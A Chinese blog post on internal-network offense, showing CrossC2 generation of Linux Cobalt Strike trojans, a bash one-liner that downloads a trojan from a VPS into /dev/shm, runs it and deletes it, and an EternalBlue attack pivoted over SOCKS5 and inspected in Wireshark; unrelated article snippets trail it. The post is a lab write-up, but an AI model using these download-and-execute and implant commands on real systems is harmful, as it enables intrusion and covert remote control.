一些近来对内网攻防的思考
我知道我最近托更托了很久了,其实也不是小编懒啊
这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。
但是总不能不更吧 
那就讲一下进来的一些内网攻防的思考吧
1.CrossC2上线Linux到CS(成功)
我么众所周知,CS是不能生成以及上线Linux的(再不配置插件的情况下),那么我们今天就带大家来配一下这个上线cs的插件
我就去kali上演示啦(你们在VPS上也是一样的,不过我VPS上已经配置好了,就不麻烦再配一次了)
我们先去github上下载这两个文件
GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload
然后我们先去解压缩那个ZIP
然后我们去CS加载这两个文件
这样,我们的CS就配置好了,然后我们去生成Linux的木马,找到另外的那个gen...linux的
先改权限,然后生成
./genCrossC2.Linux 你的VPS的ip VPS监听器的端口 null null Linux x64 木马名字所以我就这么写咯
./genCrossC2.Linux 192.168.246.170 9191 null null Linux x64 muma这里可以看见它的支持版本是4.9-4.1 ,要注意版本噢
然后我们去配置CS的监听器(只支持https 和tcp)
这个生成木马我应该就不用教了吧,不过记得要和木马对应IP和端口噢
然后就是去目标Linux上运行木马了!!!
但是呢,就真无语了
cs非常的安静
就连本地自己启动都上线不了。。。。。。。
我真无语了,那就用VPS上线一下吧!!!
还是先创建监听器,然后生成🐎
丢到目标服务器上去运行
可以看见两台机器都能上线,看来以后还是用VPS吧!!!
2.Bash无文件落地??
我们众所周知,Windos最出名的无文件落地,一定是powershell无文件落地(当然还有别的)
但是Linux呢??? 那肯定得有对应的无文件落地的啦!!! 下面这个连接讲的很详细
blogs/持久控制/Linux/Linux下的无文件攻击.md at master · aplyc1a/blogs · GitHub
这些方法好是好,但是对于脚本小子不友好!!! 假如我现在有一个Linux的马,然后又是脚本小子呢??
::: 我也想无文件啊!!!
那么就有接下来的命令
wget -U O -O - http://公网VPS/木马 > /dev/shm/木马 && chmod +x /dev/shm/木马 && /dev/shm/木马 && rm -f /dev/shm/木马
- 使用
wget命令从公网VPS的地址下载文件。 >符号将下载的文件内容输出到/dev/shm/木马文件中。&&符号表示如果前一个命令执行成功,则继续执行下一个命令。- 使用
chmod命令添加/dev/shm/木马文件的执行权限。 - 使用
/dev/shm/木马命令执行该文件,这个文件可能是一个 shell 脚本或可执行文件。 - 最后,使用
rm -f命令删除/dev/shm/木马文件。
这个命令下载的文件被保存在
/dev/shm目录下,该目录是一个临时文件系统,通常被用作内存文件系统,因此文件实际上是保存在内存中的。因此,即使在磁盘上删除了文件,内存中仍然存在这个文件的拷贝,因此删除磁盘上的文件不会影响正在内存中执行的程序。
所以你觉得这个算是无文件吗????
::感觉似乎不算,毕竟还有有文件落地得(只不过达到了一种类似无文件得效果)
那么下面就来演示一下,现在VPS上面开一个http得服务
然后直接一句话bash无文件落地
wget -U O -O - http://VPS:6888/shell > /dev/shm/shell && chmod +x /dev/shm/shell && /dev/shm/shell && rm -f /dev/shm/shell
直接上线
然后我们去看一下是否真的无文件(看一下目录下有没有)
但是在内存中还是能看见得
3.永恒之蓝shell进去会建立一个session?
以前我不是做过这样的一个实验吗?? 挂着跳板机去打内网的机器,很多时候本地不成功!!
那么我们今天Wireshark的角度上去分析一下!!!!!
首先是一台Win7(存在永恒之蓝)
然后就是一台Server(也存在永恒之蓝)
首先我的Kali是192.168.246.170,先把他放在同一网段来打一下先
然后我们再去打一下Win7
好,两台都是能打到的,那么,我们把Win7放在内网,winserver放在公网
然后win7就变成内网52这个网段
然后winserver是双网卡,同时通两个网
然后我们去Winserver上开一个socks5的隧道!!!
然后我用kali的proxychains去连接
然后我们用proxychains去启动msf
果然打不成功,这个可能是因为虚拟机网络摇曳的原因,然而,今天我想讲的是另外一个东西
还是拿回我们原来的那个攻击成功的机器,我们众所周知,永恒之蓝是通过别人开放的445端口进行攻击的,那么他是通过445进行连接的吗????
我们在进攻成功之后,就可以有一个meterpreter的界面,然后我们去看一下连接
我们不难发现,我们并不是通过445端口进行连接的,而是通过重新找了一个端口来连接我们的kali 那么另外又一个问题来了,我们shell的时候,会建立一个新的连接吗??(PORT)
于是我shell了进去,并且抓了一下数据包,我们不难发现,我们kali都是通过用的4444端口进行对win7的通信,并不存在说新建立了一个端口来通信!!! 那执行命令呢????
可以看到它的整个tcp流,也是没有建立新的端口
所以我们就可以得到一个结论,只要我们能通过proxychains打到内网,那么就不用担心会新建端口导致的流量不通!!!
所以以上失败的原因就是虚拟机摇曳!!!!!!
以上,就是一些暂时的想法了,写完这篇,小编又要投身到另一篇csdn上了!!!!
相关文章:
一些近来对内网攻防的思考
我知道我最近托更托了很久了,其实也不是小编懒啊 这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。 但是总不能不更吧 那就讲一下进来的一些内网攻防的思考吧 1.CrossC2上线Linux到CS(成功) …...
数据结构--顺序表和链表的区别
顺序表和链表之间各有优劣,我们不能以偏概全,所以我们在使用时要关注任务的注重点,以此来确定我们要使用两者中的哪一个。 不同点: 存储空间上: 顺序表在物理结构上是一定连续的,而链表(这里以带头双向循环…...
【技术分享】 OPC UA安全策略证书简述
那什么是OPC UA证书?用途是什么? 简单来说它是身份验证和权限识别。 OPC UA使用X.509证书标准,该标准定义了标准的公钥格式。建立UA会话的时候,客户端和服务器应用程序会协商一个安全通信通道。数字证书(X.509&#x…...
【Neo4jJDK开箱即用的安装全流程】
neo4j:命令行本地访问loclhost neo4j:命令行本地访问loclhost2 neo4j操作 Neo4j桌面版数据库导出导入 Neo4j安装与配置以及JDK安装与配置教程(超详细) Neo4j 安装、使用教程 Neo4j安装教程 Neo4J桌面版的配置和连接Pycharm jdk-neo对应版本 JDK ORACLE中…...
Linux 操作系统多路IO复用
1.多路IO复用 多路I/O复用是通过一种机制,可以监视多个描述符,一旦某个描述符就绪(一般是读就绪或者写就绪),能够通知程序进行相应的读写操作。 这个机制能够通过select/poll/eroll等来使用。这些函数都可以同时监视多…...
读取shape文件中数据
读取shape文件中数据 pom文件中引入依赖 <dependency><groupId>org.geotools</groupId><artifactId>gt-shapefile</artifactId><version>26.4</version></dependency>如果jar包下载不下来,在pom中添加下geotools的仓库 <…...
基于STM32F401RET6智能锁项目(使用库函数点灯、按键)
点灯硬件原理图 1、首先,我们查看一下原理图,找到相对应的GPIO口 LED_R低电平导通,LED4亮,所以LED_R的GPIO口需要配置一个低电平才能亮; LED_G低电平导通,LED3亮,所以LED_R的GPIO口需要配置一…...
网络层协议之 IP 协议
IP 协议格式 4 位版本:此处的取值只有两个,4(IPv4)和 6(IPv6),即指定 IP 协议的版本。 4 位首部长度:描述了 IP 报头多长,IP 报头是变长的,因为报头中的选项部…...
SpringBoot 实现对提供的接口进行 AES (加密,解密)
业务来源: 最近工作中,领导要求给别的项目组的小伙伴提供几个接口,要求对接口的参数进行解密操作,然后对返回的数据进行加密操作。 这时我想到了AES AES 是对称加密算法,优点:加密速度快;缺点…...
ASP.NET学生成绩管理系统
摘要 本系统依据开发要求主要应用于教育系统,完成对日常的教育工作中学生成绩档案的数字化管理。开发本系统可使学院教职员工减轻工作压力,比较系统地对教务、教学上的各项服务和信息进行管理,同时,可以减少劳动力的使用…...
谁考了第k名C++
题目描述 在一次考试中,每个学生的成绩都不相同,现知道了每个学生的学号和成绩,求考第k名学生的学号和成绩。(按成绩从大到小排列) 输入 第一行有两个整数,分别是学生的人数n(1≤n≤100&…...
多线服务器的优势有哪些?
服务器中包含着多线服务器、双线服务器和单线服务器等,其中多线服务器可以支持多个IP地址,今天小编就来带领大家一些来了解一下多线服务器的优势有哪些吧! 多线服务器是在一个互联网数据中心,通过特殊的技术手段将不同的多家网络接…...
vue + element-plus 开发中遇到的问题
1.问题之路由守卫 初写路由守卫,对于next()的理解不是很透彻,就想着都放行,不然看不到效果,结果控制台出现了警告,想着报黄的问题就不是问题,但仔细一看发现他说,如果再生产阶段就会失败&#x…...
使用java远程提交flink任务到yarn集群
使用java远程提交flink任务到yarn集群 背景 由于业务需要,使用命令行的方式提交flink任务比较麻烦,要么将后端任务部署到大数据集群,要么弄一个提交机,感觉都不是很离线。经过一些调研,发现可以实现远程的任务发布。…...
麻了!新增4.1分,CCF-C类,2区毕业神刊,被标记On Hold!
本周投稿推荐 SSCI • 2区社科类,3.0-4.0(社科均可) EI • 计算机工程类(接收广,录用极快) SCI&EI • 4区生物医学类,1.5-2.0(录用率99%) • 1区工程类&#…...
tomcat 的启动流程
tomcat 的启动流程 中 使用的Lifecycle 生命流程 。在这里还使用了设计模式中的模板模式(LifecycleBase 是一个模板类) init()方法 start() 方法 container 的处理...
YOLOv9全网最新改进系列::YOLOv9完美融合双卷积核(DualConv)来构建轻量级深度神经网络,目标检测模型有效涨点神器!!!
YOLOv9全网最新改进系列::YOLOv9完美融合双卷积核(DualConv)来构建轻量级深度神经网络,目标检测模型有效涨点神器!!! YOLOv9原文链接戳这里,原文全文翻译请关注B站Ai学术叫叫首er …...
PCIE协议-2-事务层规范-MEM/IO/CFG request rules
2.2.7 内存、I/O和配置请求规则 以下规则适用于所有内存、I/O和配置请求。每种类型的请求还有特定的额外规则。 所有内存、I/O和配置请求除了常见的头标字段外,还包括以下字段:requester ID[15:0]和Tag[9:0],形成事务ID。Last DW BE[3:0] a…...
jmeter分布式集群压测
目的:通过多台机器同时运行 性能压测 脚本,模拟更好的并发压力 简单点:就是一个人(控制机controler/调度机 master)做一个项目的时候,压力有点大,会导致结果不理想,这时候找几个人&a…...
美国加州正测试ChatGPT等生成式AI,在4大部门应用
5月11日,美联社消息,美国加州政府正在测试ChatGPT等生成式AI,应用在税收和收费管理部、交通部、公共卫生部以及卫生与公众服务部4大部门。 测试时间6个月,为其提供技术支持的一共有5家公司,分别是OpenAI、Anthropic、…...
Lemur性能优化:10个提升证书管理平台响应速度的技巧
Lemur性能优化:10个提升证书管理平台响应速度的技巧 【免费下载链接】lemur Repository for the Lemur Certificate Manager 项目地址: https://gitcode.com/gh_mirrors/le/lemur Lemur作为一款开源证书管理平台,能够帮助用户轻松管理SSL/TLS证书…...
)
ComfyUI全面掌握-知识点详解——ComfyUI 开发与扩展基础(开发指南+环境搭建)
本文为「ComfyUI 全面掌握」系列第 23 篇,是高阶进阶章节的第一篇知识点详解博客。作为开发系列的起点,本文将带你系统了解 ComfyUI 社区贡献流程,并手把手搭建完整的自定义节点开发环境,为后续的节点开发与发布奠定坚实的技术基础…...
远程技术面试的潜规则:摄像头角度可能影响你的录用
一、摄像头角度:被忽视的专业细节在软件测试的工作中,我们习惯用严谨的态度去排查代码里的每一个bug,用精准的测试用例去验证产品的每一项功能。但在远程技术面试这个特殊的“测试场景”里,很多人却忽略了一个看似无关紧要&#x…...
嘉立创EDA:原理图到PCB学习总结
1.原理图: 关于原理图绘制可以看项目需要哪些板块,去网上搜索开源项目跟着上面一步一步绘制即可,或者利用豆包来一步一步生成板块 主要要注意: 电源要加电容进行滤除杂波 一般带有功能的引脚是3.3V不要输入5V到这些IO口降压芯…...
JMeter接口断言实战:从响应匹配到业务逻辑校验
1. 断言不是“加个勾就完事”的装饰品,而是接口测试的判决书很多人第一次在JMeter里点开“添加 → 断言 → 响应断言”,填上一个“包含文本:success”,跑完看绿色小对勾亮了,就以为测试通过了——结果上线后接口明明返…...
AhMyth:跨平台Android远程管理工具的完整指南与实战教程
AhMyth:跨平台Android远程管理工具的完整指南与实战教程 【免费下载链接】AhMyth Cross-Platform Android Remote Administration Tool | The only maintained version of AhMyth on github | A revival of the original repository at https://GitHub.com/AhMyth/A…...
向量化智能矩阵系统的语义坍塌:当10万条内容同时找“相似“,为什么你的数据库扛不住?
摘要:智能矩阵系统从"关键词匹配"进化到"语义匹配"之后,遇到了一个被严重低估的性能瓶颈——向量检索的语义坍塌。本文从向量数据库原理、ANN近似最近邻算法、HNSW图索引、向量量化技术四个底层技术出发,拆解向量化智能矩…...
)
为什么你的ElevenLabs四川话输出总像“普通话+口音”?3步声学特征解耦法让韵律自然度提升2.8倍(附Python声谱可视化代码)
更多请点击: https://intelliparadigm.com 第一章:为什么你的ElevenLabs四川话输出总像“普通话口音”? ElevenLabs 当前并未提供原生四川话(西南官话成渝片)语音模型,其所谓“方言支持”实为在标准普通话…...
PS左边工具栏不见了?最全恢复解决教程
在使用Photoshop进行修图、设计操作时,左侧工具栏作为核心功能面板,承载着选区、绘画、修图等常用工具,一旦莫名消失,会直接中断操作、影响效率。很多新手遇到这种情况会手足无措,其实无需慌张,今天就给大家…...
2026年SSL证书市场便宜且安全的SSL证书调研
随着互联网安全标准的不断升级,HTTPS加密已成为网站和各类数字应用的“标配”。然而,对于广大的中小企业、个人开发者以及初创团队而言,如何在控制成本的前提下,获取一张既便宜又足够安全的SSL证书,始终是一道棘手的难…...